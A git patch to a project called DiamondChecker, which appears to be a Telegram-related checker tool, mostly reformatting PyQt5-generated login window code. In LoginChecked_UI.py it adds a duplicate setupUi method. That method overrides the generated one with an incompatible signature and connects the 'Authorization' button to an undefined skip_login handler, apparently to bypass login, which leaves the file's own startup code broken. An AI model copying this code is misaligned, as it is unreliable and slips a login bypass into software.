From 8b43b3d7997d267658d62ed7410b0d83d9fee9d8 Mon Sep 17 00:00:00 2001 From: Opensourced <139492588+OpensourcedPro@users.noreply.github.com> Date: Wed, 28 Feb 2024 03:45:41 -0500 Subject: [PATCH] Add files via upload --- DiamondChecker/LoginChecked_UI.py | 144 +- DiamondChecker/LoginChecked_UI.ui | 164 +- DiamondChecker/LoginCheked_UI.py | 1043 ++++---- DiamondChecker/LoginCheked_UI.ui | 2743 ++++++++++----------- DiamondChecker/canapeshecka_bd.py | 66 +- DiamondChecker/convert.py | 10 + DiamondChecker/jsoni_control.py | 58 +- DiamondChecker/main.py | 3407 +++++++++++++------------- DiamondChecker/main_ui.py | 2184 ++++++++--------- DiamondChecker/main_ui.ui | 3754 ++++++++++++++--------------- DiamondChecker/main_ui1.py | 2184 ++++++++--------- DiamondChecker/proxies.txt | 50 +- DiamondChecker/settings.json | 240 +- DiamondChecker/ui_main.py | 2184 ++++++++--------- DiamondChecker/useragents.txt | 952 ++++---- 15 files changed, 9444 insertions(+), 9739 deletions(-) create mode 100644 DiamondChecker/convert.py diff --git a/DiamondChecker/LoginChecked_UI.py b/DiamondChecker/LoginChecked_UI.py index bdf71ce..ae34391 100644 --- a/DiamondChecker/LoginChecked_UI.py +++ b/DiamondChecker/LoginChecked_UI.py @@ -1,70 +1,74 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'LoginChecked_UI.ui' -# -# Created by: PyQt5 UI code generator 5.15.10 -# -# WARNING: Any manual changes made to this file will be lost when pyuic5 is -# run again. Do not edit this file unless you know what you are doing. - - -from PyQt5 import QtCore, QtGui, QtWidgets - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName("MainWindow") - MainWindow.resize(471, 136) - MainWindow.setStyleSheet(" background-color: #232629;\n" -" color: #ffffff;") - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName("centralwidget") - self.lineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit.setGeometry(QtCore.QRect(10, 10, 451, 41)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit.setFont(font) - self.lineEdit.setStyleSheet(" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;") - self.lineEdit.setObjectName("lineEdit") - self.pushButton = QtWidgets.QPushButton(self.centralwidget) - self.pushButton.setGeometry(QtCore.QRect(10, 60, 451, 41)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.pushButton.setFont(font) - self.pushButton.setStyleSheet(" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"") - self.pushButton.setDefault(False) - self.pushButton.setObjectName("pushButton") - MainWindow.setCentralWidget(self.centralwidget) - self.statusbar = QtWidgets.QStatusBar(MainWindow) - self.statusbar.setObjectName("statusbar") - MainWindow.setStatusBar(self.statusbar) - - self.retranslateUi(MainWindow) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - - def retranslateUi(self, MainWindow): - _translate = QtCore.QCoreApplication.translate - MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) - self.lineEdit.setText(_translate("MainWindow", "Telegram login (without \"@\")")) - self.pushButton.setText(_translate("MainWindow", "Authorization")) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) +# -*- coding: utf-8 -*- + +# Form implementation generated from reading ui file 'LoginChecked_UI.ui' +# +# Created by: PyQt5 UI code generator 5.15.10 +# +# WARNING: Any manual changes made to this file will be lost when pyuic5 is +# run again. Do not edit this file unless you know what you are doing. + + +from PyQt5 import QtCore, QtGui, QtWidgets + + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName("MainWindow") + MainWindow.resize(471, 136) + MainWindow.setStyleSheet(" background-color: #232629;\n" +" color: #ffffff;") + self.centralwidget = QtWidgets.QWidget(MainWindow) + self.centralwidget.setObjectName("centralwidget") + self.lineEdit = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit.setGeometry(QtCore.QRect(10, 10, 451, 41)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit.setFont(font) + self.lineEdit.setStyleSheet(" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;") + self.lineEdit.setObjectName("lineEdit") + self.pushButton = QtWidgets.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(10, 60, 451, 41)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.pushButton.setFont(font) + self.pushButton.setStyleSheet(" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"") + self.pushButton.setDefault(False) + self.pushButton.setObjectName("pushButton") + MainWindow.setCentralWidget(self.centralwidget) + self.statusbar = QtWidgets.QStatusBar(MainWindow) + self.statusbar.setObjectName("statusbar") + MainWindow.setStatusBar(self.statusbar) + + self.retranslateUi(MainWindow) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + + def retranslateUi(self, MainWindow): + _translate = QtCore.QCoreApplication.translate + MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) + self.lineEdit.setText(_translate("MainWindow", "Telegram login (without \"@\")")) + self.pushButton.setText(_translate("MainWindow", "Authorization")) + + def setupUi(self): + # Create the authorization_button and add it to the parent widget + authorization_button = QtWidgets.QPushButton("Authorization", self) + authorization_button.clicked.connect(self.skip_login) + +if __name__ == "__main__": + import sys + app = QtWidgets.QApplication(sys.argv) + MainWindow = QtWidgets.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) diff --git a/DiamondChecker/LoginChecked_UI.ui b/DiamondChecker/LoginChecked_UI.ui index 82412db..90b93ef 100644 --- a/DiamondChecker/LoginChecked_UI.ui +++ b/DiamondChecker/LoginChecked_UI.ui @@ -1,82 +1,82 @@ - - - MainWindow - - - - 0 - 0 - 471 - 136 - - - - MainWindow - - - background-color: #232629; - color: #ffffff; - - - - - - 10 - 10 - 451 - 41 - - - - - Furore - 10 - - - - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; - - - Telegram login (without "@") - - - - - - 10 - 60 - 451 - 41 - - - - - Furore - 10 - - - - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; - - - - Authorization - - - false - - - - - - - - + + + MainWindow + + + + 0 + 0 + 471 + 136 + + + + MainWindow + + + background-color: #232629; + color: #ffffff; + + + + + + 10 + 10 + 451 + 41 + + + + + Furore + 10 + + + + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; + + + Telegram login (without "@") + + + + + + 10 + 60 + 451 + 41 + + + + + Furore + 10 + + + + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; + + + + Authorization + + + false + + + + + + + + diff --git a/DiamondChecker/LoginCheked_UI.py b/DiamondChecker/LoginCheked_UI.py index defce5c..75e5a64 100644 --- a/DiamondChecker/LoginCheked_UI.py +++ b/DiamondChecker/LoginCheked_UI.py @@ -1,575 +1,468 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'LoginCheked_UI.ui' -# -# Created by: PyQt5 UI code generator 5.15.9 -# -# WARNING: Any manual changes made to this file will be lost when pyuic5 is -# run again. Do not edit this file unless you know what you are doing. - - -from PyQt5 import QtCore, QtGui, QtWidgets - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName("MainWindow") - MainWindow.resize(1067, 801) - MainWindow.setStyleSheet(" background-color: #232629;\n" -" color: #ffffff;") - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName("centralwidget") - self.login_tab_widget = QtWidgets.QTabWidget(self.centralwidget) - self.login_tab_widget.setGeometry(QtCore.QRect(570, 20, 471, 601)) - self.login_tab_widget.setTabPosition(QtWidgets.QTabWidget.East) - self.login_tab_widget.setTabShape(QtWidgets.QTabWidget.Triangular) - self.login_tab_widget.setTabsClosable(True) - self.login_tab_widget.setTabBarAutoHide(True) - self.login_tab_widget.setObjectName("login_tab_widget") - self.tab = QtWidgets.QWidget() - self.tab.setObjectName("tab") - self.c_label_button = QtWidgets.QPushButton(self.tab) - self.c_label_button.setGeometry(QtCore.QRect(230, 500, 30, 30)) - self.c_label_button.setMaximumSize(QtCore.QSize(30, 30)) - palette = QtGui.QPalette() - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) - self.c_label_button.setPalette(palette) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.c_label_button.setFont(font) - self.c_label_button.setMouseTracking(True) - self.c_label_button.setCheckable(False) - self.c_label_button.setObjectName("c_label_button") - self.u_label_button = QtWidgets.QPushButton(self.tab) - self.u_label_button.setGeometry(QtCore.QRect(130, 500, 30, 30)) - self.u_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.u_label_button.setFont(font) - self.u_label_button.setCheckable(False) - self.u_label_button.setChecked(False) - self.u_label_button.setObjectName("u_label_button") - self.o_label_button = QtWidgets.QPushButton(self.tab) - self.o_label_button.setGeometry(QtCore.QRect(80, 500, 30, 30)) - self.o_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.o_label_button.setFont(font) - self.o_label_button.setObjectName("o_label_button") - self.login_label = QtWidgets.QLabel(self.tab) - self.login_label.setGeometry(QtCore.QRect(140, 110, 100, 40)) - font = QtGui.QFont() - font.setPointSize(20) - font.setBold(True) - self.login_label.setFont(font) - self.login_label.setStyleSheet("color:rgba(0, 0, 0, 200);") - self.login_label.setObjectName("login_label") - self.S_label_button = QtWidgets.QPushButton(self.tab) - self.S_label_button.setGeometry(QtCore.QRect(30, 500, 30, 30)) - self.S_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.S_label_button.setFont(font) - self.S_label_button.setObjectName("S_label_button") - self.r_label_button = QtWidgets.QPushButton(self.tab) - self.r_label_button.setGeometry(QtCore.QRect(180, 500, 30, 30)) - self.r_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.r_label_button.setFont(font) - self.r_label_button.setObjectName("r_label_button") - self.Forgot_username_label = QtWidgets.QLabel(self.tab) - self.Forgot_username_label.setGeometry(QtCore.QRect(110, 370, 201, 16)) - self.Forgot_username_label.setStyleSheet("color:rgba(0, 0, 0, 210);") - self.Forgot_username_label.setObjectName("Forgot_username_label") - self.e_label_button = QtWidgets.QPushButton(self.tab) - self.e_label_button.setGeometry(QtCore.QRect(280, 500, 30, 30)) - self.e_label_button.setMaximumSize(QtCore.QSize(30, 30)) - palette = QtGui.QPalette() - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) - self.e_label_button.setPalette(palette) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.e_label_button.setFont(font) - self.e_label_button.setMouseTracking(True) - self.e_label_button.setCheckable(False) - self.e_label_button.setObjectName("e_label_button") - self.want_to_register_button = QtWidgets.QLabel(self.tab) - self.want_to_register_button.setGeometry(QtCore.QRect(140, 400, 101, 16)) - self.want_to_register_button.setStyleSheet("color:rgba(0, 0, 0, 210);") - self.want_to_register_button.setObjectName("want_to_register_button") - self.d_label_button = QtWidgets.QPushButton(self.tab) - self.d_label_button.setGeometry(QtCore.QRect(330, 500, 30, 30)) - self.d_label_button.setMaximumSize(QtCore.QSize(30, 30)) - palette = QtGui.QPalette() - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) - brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) - brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) - brush.setStyle(QtCore.Qt.SolidPattern) - palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) - self.d_label_button.setPalette(palette) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.d_label_button.setFont(font) - self.d_label_button.setMouseTracking(True) - self.d_label_button.setCheckable(False) - self.d_label_button.setObjectName("d_label_button") - self.o_label_button_2 = QtWidgets.QPushButton(self.tab) - self.o_label_button_2.setGeometry(QtCore.QRect(100, 440, 30, 30)) - self.o_label_button_2.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.o_label_button_2.setFont(font) - self.o_label_button_2.setObjectName("o_label_button_2") - self.P_label_button = QtWidgets.QPushButton(self.tab) - self.P_label_button.setGeometry(QtCore.QRect(150, 440, 30, 30)) - self.P_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.P_label_button.setFont(font) - self.P_label_button.setObjectName("P_label_button") - self.E_label_button = QtWidgets.QPushButton(self.tab) - self.E_label_button.setGeometry(QtCore.QRect(200, 440, 30, 30)) - self.E_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.E_label_button.setFont(font) - self.E_label_button.setObjectName("E_label_button") - self.N_label_button = QtWidgets.QPushButton(self.tab) - self.N_label_button.setGeometry(QtCore.QRect(250, 440, 30, 30)) - self.N_label_button.setMaximumSize(QtCore.QSize(30, 30)) - font = QtGui.QFont() - font.setFamily("Social Media Circled") - font.setPointSize(15) - self.N_label_button.setFont(font) - self.N_label_button.setObjectName("N_label_button") - self.backdrop_holder_2 = QtWidgets.QLabel(self.tab) - self.backdrop_holder_2.setGeometry(QtCore.QRect(-540, -10, 531, 611)) - self.backdrop_holder_2.setStyleSheet("background-color:rgba(0, 0, 0, 80);\n" -"border-top-left-radius: 50px;") - self.backdrop_holder_2.setText("") - self.backdrop_holder_2.setObjectName("backdrop_holder_2") - self.update_1_label_5 = QtWidgets.QLabel(self.tab) - self.update_1_label_5.setGeometry(QtCore.QRect(-520, 200, 241, 91)) - self.update_1_label_5.setObjectName("update_1_label_5") - self.update_3_label_2 = QtWidgets.QLabel(self.tab) - self.update_3_label_2.setGeometry(QtCore.QRect(-520, 370, 241, 91)) - self.update_3_label_2.setObjectName("update_3_label_2") - self.program_description_2 = QtWidgets.QLabel(self.tab) - self.program_description_2.setGeometry(QtCore.QRect(-521, 60, 241, 50)) - font = QtGui.QFont() - font.setPointSize(10) - font.setBold(True) - self.program_description_2.setFont(font) - self.program_description_2.setStyleSheet("color:rgba(255, 255, 255, 170);") - self.program_description_2.setObjectName("program_description_2") - self.program_stats_frame_2 = QtWidgets.QFrame(self.tab) - self.program_stats_frame_2.setGeometry(QtCore.QRect(-530, 540, 511, 51)) - self.program_stats_frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel) - self.program_stats_frame_2.setFrameShadow(QtWidgets.QFrame.Raised) - self.program_stats_frame_2.setObjectName("program_stats_frame_2") - self.update_1_label_7 = QtWidgets.QLabel(self.tab) - self.update_1_label_7.setGeometry(QtCore.QRect(-270, 290, 241, 91)) - self.update_1_label_7.setObjectName("update_1_label_7") - self.update_2_label_2 = QtWidgets.QLabel(self.tab) - self.update_2_label_2.setGeometry(QtCore.QRect(-520, 280, 241, 91)) - self.update_2_label_2.setObjectName("update_2_label_2") - self.update_1_label_8 = QtWidgets.QLabel(self.tab) - self.update_1_label_8.setGeometry(QtCore.QRect(-260, 390, 241, 91)) - self.update_1_label_8.setObjectName("update_1_label_8") - self.update_1_label_9 = QtWidgets.QLabel(self.tab) - self.update_1_label_9.setGeometry(QtCore.QRect(-260, 200, 241, 91)) - self.update_1_label_9.setObjectName("update_1_label_9") - self.program_backdrop_2 = QtWidgets.QLabel(self.tab) - self.program_backdrop_2.setGeometry(QtCore.QRect(-530, 0, 521, 130)) - self.program_backdrop_2.setStyleSheet("background-color:rgba(0, 0, 0, 75);") - self.program_backdrop_2.setText("") - self.program_backdrop_2.setObjectName("program_backdrop_2") - self.program_title_2 = QtWidgets.QLabel(self.tab) - self.program_title_2.setGeometry(QtCore.QRect(-260, 10, 231, 81)) - font = QtGui.QFont() - font.setPointSize(22) - font.setBold(True) - self.program_title_2.setFont(font) - self.program_title_2.setStyleSheet("color:rgba(255, 255, 255, 200);") - self.program_title_2.setObjectName("program_title_2") - self.lineEdit = QtWidgets.QLineEdit(self.tab) - self.lineEdit.setGeometry(QtCore.QRect(60, 200, 301, 41)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit.setFont(font) - self.lineEdit.setStyleSheet(" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;") - self.lineEdit.setObjectName("lineEdit") - self.pushButton = QtWidgets.QPushButton(self.tab) - self.pushButton.setGeometry(QtCore.QRect(40, 270, 341, 41)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.pushButton.setFont(font) - self.pushButton.setStyleSheet(" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"") - self.pushButton.setDefault(False) - self.pushButton.setObjectName("pushButton") - icon = QtGui.QIcon() - 